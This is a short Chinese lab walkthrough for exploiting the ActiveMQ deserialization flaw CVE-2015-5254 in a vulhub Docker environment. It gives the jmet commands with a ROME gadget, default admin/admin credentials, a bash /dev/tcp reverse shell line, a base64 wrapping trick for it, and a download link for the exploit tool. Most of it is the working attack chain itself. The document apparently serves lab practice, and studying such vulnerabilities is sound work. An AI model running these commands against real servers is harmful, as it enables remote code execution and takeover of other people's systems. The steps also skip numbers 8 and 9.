1、开启docker服务
systemctl start docker.service
2、切换目录
cd vulhub/activemq/CVE-2015-5254
3、启动环境
docker-compose up
4、查看docker服务允许在那个端口下
5、通过未授权访问(admin/admin),在客户机上打开浏览器输入本机ip+docker后台管理系统的端口好(8161)
192.168.99.25:8161(不用打开Apache服务)
6、创建success
这里我们要用到JAVA的中间件(imet-0.1.0-all.gar)
链接:https://pan.baidu.com/s/1woqq5b26mblH8UXCqXHmUA
提取码:lj0i
在你放置JAVA中间件的地方输入 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.99.25 61616
7、访问消息页面(用户和密码默认都是admin)
http://192.168.99.25:8161/admin/queues.jsp
10、点击消息触发时事件
11、查看是否创建成功
12、反弹shell
bash -i >& /dev/tcp/ip/1000 0>&1
13、shell进行base64编码
https://www.jackson-t.ca/runtime-exec-payloads.html
bash -c {echo,编码内容}|{base64,-d}|{bash,-i}
14、反弹shell
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "编码shell" -Yp ROME 192.168.99.25 61616